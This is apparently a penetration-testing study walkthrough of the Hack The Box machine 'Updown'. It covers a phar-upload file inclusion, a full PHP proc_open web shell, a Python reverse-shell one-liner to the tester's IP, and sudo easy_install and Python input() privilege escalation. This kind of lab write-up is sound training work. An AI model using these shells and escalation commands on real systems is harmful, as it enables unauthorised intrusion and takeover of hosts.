OSCP
Total OSCP GuidePayloads All The Things
  • Welcome!
    • ⬆️Privilege Escalation
      • 🪟Windows
        • 📋Windows Privesc Checklist
        • 🚪Backdoor & RDP Access
        • Service Binary Hijacking
        • SeBackupPrivilege
        • SeRestorePrivilege
        • SeDebugPrivilege
        • SeEnableDelegationPrivilege
        • SeTakeOwnershipPrivilege
        • SeManageVolumePrivilege
        • SeLoadDriverPrivilege
        • DnsAdmins
        • Hyper-V Administrators
        • Server Operators
        • GPO
        • Mimikatz
        • Weak Permissions
        • Vulnerable Services
        • DLL Injection
        • Citrix Breakout
        • UAC
        • Credential Hunting
        • 🔎Windows Post Enumeration
        • 🥔Potatoes
      • 🐧Linux
        • 📋Linux Privesc Checklist
        • ✳️Sudo Tar Wildcard
        • nfs privesc
        • ↻ logrotate
        • Capabilities
        • Password Authentication Abuse
    • 🖥️Active Directory
      • 🔎AD Post Enumeration/Exploitation
        • 🔎Powerview
        • 🐶Bloodhound
      • 🔧AD Tools
      • 👾AD Exploitation
        • Post Exploitation
        • PowerShell
        • 🔥Asreproasting
        • 🔥Kerberoasting
        • 🔁DCSync
        • 🥇Golden Ticket Attacks
        • 🥈Silver Ticket Attack
        • PetitPotam
        • 🏃SMB Relaying
        • 📜Certificate Authority (CA)
        • Pass the Password or Pass the Hash
        • ➡️Lateral Movement
          • Child-to-Parent CIFS
          • ExtraSids
    • 🔎Enumeration
      • 📋Enumeration Checklist
      • SNMP Enumeration
      • IRC Enumeration
      • FTP Enumeration
      • SMTP Enumeration
      • TFTP Enumeration
      • RPC Enumeration
      • Postgres Enumeration
      • Ldap Enumeration
      • RPC Enumeration
      • Strategy
      • RDP Session Hijacking
      • Bullet Proof Strategy Methodology
    • 🕵️‍♂️Exploitation
      • Client Side Attacks
        • ODT Macro (Libreoffice)
        • Microsoft Office Macros
      • 🐚Shells & Payloads
      • 🔐Password Attacks
    • 🕸️Web Applications
      • SSRF
      • 📋Web Application Checklist
      • 💉SQL Injection
      • </> Command Injections
      • 🏞️Path Traversal & File Inclusion
      • 📤File Upload Attacks
      • 🔓IDOR(Insecure Direct Object References)
      • ❌XSS (Cross-Site Scripting)
      • 👽XXE(XML External Entity)
      • 🦪Log4Shell
      • 💻Abusing APIs
      • 📖Custom Wordlist
      • 📛Bypassing WAF
    • 🔀Pivoting
    • 📁File Transfer
    • Buffer Overflow
    • Miscellaneous
    • Ⓜ️Metasploit
    • 🚶 Walkthroughs
      • Hack The Box
        • Absolute HTB
        • Active HTB
        • Arctic HTB
        • Bank Robber HTB
        • Bashed HTB
        • BLUE HTB
        • Cerberus HTB
        • Devel HTB
        • Escape HTB
        • Forest HTB
        • Granny HTB
        • Headless HTB
        • Jerry HTB
        • Kioptrix
        • Lame HTB
        • Legacy HTB
        • Netmon HTB
        • Nibbles HTB
        • Node HTB
        • Optimum HTB
        • Pandora HTB
        • Sense Htb
        • Soccer HTB
        • Stream IO
        • Support HTB
        • Updown HTB
      • PG Practice
        • Access 2
          • 80
          • Exploit
        • Apex
          • 80
          • 445
          • 3306
          • Exploit
        • Astronaut
          • 80
          • Exploit
        • Auth By
          • 21
          • 242
          • 3145
        • Billyboss
          • 21
          • 8081
        • Boolean
          • 80
          • 33017
          • Exploit
        • Bullybox
          • 80
          • Exploit
        • Clue
          • 445
          • 3000
          • 8021
          • Exploit
        • Cockpit
          • 80
          • 9090
          • Exploit
        • DVR 4
          • 22
          • 8080
        • Extplorer
          • 80
          • Exploit
        • Fanatastic
          • 3000
          • Exploit
        • Fired
          • 9090
          • 9091
        • Flu
          • 8090
          • Exploit
        • Hawat
          • 17445
          • 30455
          • 50080
          • Exploit
        • Heist
          • 80
          • Exploit
        • Hepet
          • 25
          • 143
          • 20001
          • 79 Finger
          • 8000 Or 443
          • Exploit
        • Hetemit
          • 80
          • 18000
          • 50000
          • Exploit
        • Hokkaido
          • 445
          • 1433
        • Hunit
          • 8080
          • 12445
          • 18030
          • Exploit
        • Hutch
          • 80
          • 389
          • 445
        • La Vita
          • 80
        • Levram
          • 8000
        • Marketing
          • 80
          • Exploit
        • Medjed
          • 445
          • 8000
          • 30021
          • 33033
          • 44330
          • 45332
          • Med Jed
        • Mzeeav
          • 80
        • Nagoya
        • Nickel
          • 22
          • 80
          • 8089
          • 33333
        • Nukem
          • 80
          • Exploit
        • Ochima
          • 8338
        • Payday
          • 80
          • RPC
        • Pc
          • 8000
          • 65432
          • Exploit
        • Peppo
          • 22
          • 113
          • 8080
          • Exploit
        • Post Fish
          • 22
          • 80
          • 143
          • Exploit
        • Pyloader
          • 9666
          • Exploit
        • Quacker Jack
          • 80
          • 445
          • 8081
          • Exploit
        • Readys
          • 80
          • 6379
          • Exploit
        • Resourced
        • Roquefort
          • 3000
          • Exploit
        • Scrutiny
          • 80
        • Shenzi
          • 80
          • 445
          • 3306
          • Exploit
        • Slort
          • 8080
          • Exploit
        • Sorcerer
          • 80
          • 7742
          • 8080
          • Exploit
        • Squid
          • 445
          • 3128
          • 8080
          • Exploit
        • Sybaris
          • 21
          • 6379
          • Exploit
        • Walla
          • 23
          • 25
          • 8091
          • Exploit
        • Wombo
          • 80
          • 6379
          • 8080
          • Exploit
        • Xposedapi
          • 13337
        • Zen Photo
          • 23
          • 80
          • 3306
          • Exploit
        • Zipper
          • 80
        • Access
        • Algernon
        • Bratarina
        • Clam AV
        • Craft
        • Exfiltrated
        • Heist
        • Helpdesk
        • Hokkaido
        • Internal
        • Jacko
        • Kevin
        • Nibbles
        • Pebbles
        • Pelican
        • Snookums
        • Twiggy
        • Vault
      • Try Hack Me
        • All Signs Point 2 Pwnage
          • 21
          • 80
          • 445
        • Attacktive Directory
          • 445
          • Kerberos
        • Blueprint
          • 445
          • 8080
          • Exploit
        • Hack Park
          • 80
        • Relevent
          • 80
          • 443
          • 445
          • 49663
          • Exploit
        • Weasel
          • 445
          • 8888
          • Exploit
        • Wreath
          • MS 01
            • 22
            • 443
            • 10000
          • Ms 02
            • 80
          • Ms 03
            • 80
            • Exploit
        • Year Of The Owl
          • 80
          • 161
          • 445
          • 5985
          • Exploit
      • Vuln Lab
        • Baby
        • Baby 2
        • Bamboo
        • Breach
        • Bruno
        • Data
        • Delegate
        • Dump
        • Escape
        • Feedback
        • Forgotten
        • Hybrid
        • Job 2
        • Lock
        • Media
        • Reflection
        • Retro
        • Sendai
        • Slonik
        • Sync
        • Tengu
        • Trusted
Powered by GitBook
On this page

Was this helpful?

  1. Welcome!
  2. 🚶 Walkthroughs
  3. Hack The Box

Updown HTB

PreviousSupport HTBNextPG Practice

Last updated 8 months ago

Was this helpful?

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a website hosted on apache and its dns is siteup.htb Using nc to listen on port 80 and accessing our ip we get: Nothing much was discovered Now trying http://127.0.0.1 with debug mode we get Trying to access files with file:///etc/passwd It says hacker detected. Trying to ping our machine with ftp://10.10.14.37 Trying gophergopher://10.10.14.37:70 Now running gobuster we found the dev directory. Now trying to run one more gobuster on dev directory Since it is .git using git-dumper to get source code Index.php Trying to access index.php with burpsuite: Checking out git commits using git log So checking this commit with git checkout 8812785e31c879261050e72e20f298ae8c43b565 So trying the header We just get a 200 OK We notice that there is a vhost so trying dev.siteisup.htb We get an access forbidden. But adding the header we get the response. Now we can add a match and replace rule to bypass the WAF. Now we notice there is a file upload q The file gets deleted after checking sooooo we gotta hang. Can do this by adding our ip to the test.txt and using nc -nlvpk 80 to keep the connection. Now we can access it yaaaaaaayyyy: But we still need to get around the fact that .php files are blocked.

Here comes the Important trick for bypassing this. We can get LFI by using a .phar file (can also use any extension like jpeg). zip test.phar test.php Then to access it: http://dev.siteisup.htb/?page=phar://uploads/f0217cf843d10cf70a840fb19967a434/test.phar/test or with burp suite: We get a 500 internal error instead of 200 ok Now trying a php with echo in it instead of the webshell.

no need to add .php as it is in the code to add With echo command we get code execution: <?php echo 'YtfNotWorking' ?> Trying <?php phpinfo(); ?> We get a list of disabled functions To get a dangerous function we could use this: https://github.com/teambi0s/dfunc-bypasser or we can create our own php code from it.

<?php 
$dangerous_functions = array('pcntl_alarm','pcntl_fork','pcntl_waitpid','pcntl_wait','pcntl_wifexited','pcntl_wifstopped',
'pcntl_wifsignaled','pcntl_wifcontinued','pcntl_wexitstatus','pcntl_wtermsig','pcntl_wstopsig','pcntl_signal','pcntl_signal_get_handler',
'pcntl_signal_dispatch','pcntl_get_last_error','pcntl_strerror','pcntl_sigprocmask','pcntl_sigwaitinfo','pcntl_sigtimedwait','pcntl_exec',
'pcntl_getpriority','pcntl_setpriority','pcntl_async_signals','error_log','system','exec','shell_exec','popen','proc_open','passthru',
'link','symlink','syslog','ld','mail','mb_send_mail','imap_open','imap_mail','libvirt_connect','gnupg_init','imagick');

foreach ($dangerous_functions as $function) {
    if (function_exists($function)) {
        echo $function . " is enabled.";
    }
}
?>

So now using a web shell with proc_open

<?php
function execute_command($cmd) {
    $descriptors = [
        0 => ['pipe', 'r'], 
        1 => ['pipe', 'w'], 
        2 => ['pipe', 'w']  
    ];

    $process = proc_open($cmd, $descriptors, $pipes);

    if (is_resource($process)) {
        
        $output = stream_get_contents($pipes[1]);
        $errors = stream_get_contents($pipes[2]);

        // Close the pipes
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);

        // Close the process
        proc_close($process);

        // Prepare the output for HTML display
        $output = htmlspecialchars($output, ENT_QUOTES, 'UTF-8');
        $errors = htmlspecialchars($errors, ENT_QUOTES, 'UTF-8');
[[IDOR(Insecure Direct Object References)]] module.
        // Output the result in a user-friendly manner
        echo '<pre>';
        echo '<strong>Command:</strong> ' . $cmd . "\n\n";
        echo '<strong>Output:</strong>' . "\n" . $output . "\n";
        echo '<strong>Errors:</strong>' . "\n" . $errors . "\n";
        echo '</pre>';
    }
}

// Check if a command is submitted
if (isset($_POST['command'])) {
    // Get the command from the form submission and execute it
    $command = $_POST['command'];
    execute_command($command);
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>W3bSh3ll by d4rkiZ</title>
</head>
<body>
    <h1>W3bSh3ll by d4rkiZ</h1>
    <form method="POST" action="">
        <input type="text" name="command" placeholder="Enter your command">
        <button type="submit">Send</button>
    </form>
</body>
</html>

Now uploading it and accessing it with: http://dev.siteisup.htb/uploads/2242456f01bba35834701e734af17d63/shell.phar/shell Then using a python shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.37",9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We had to use the ssh key to access user.txt because only setuid was used and not setgid too Now we notice we can run easy_install as sudo so using gtfobins:

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF

Now archiving it into dangerous.phar Using this we get the answer in burp: proc_open is available

Now we find 2 files in dev directory: Of file types: Now checking the python file: It is a python2 file. Since it is taking an input and has a suid or setuid bit. We can privesc with python input as the siteisup application calls for the python file: __import__('os').system('/bin/bash') It worked!

We got a root shell: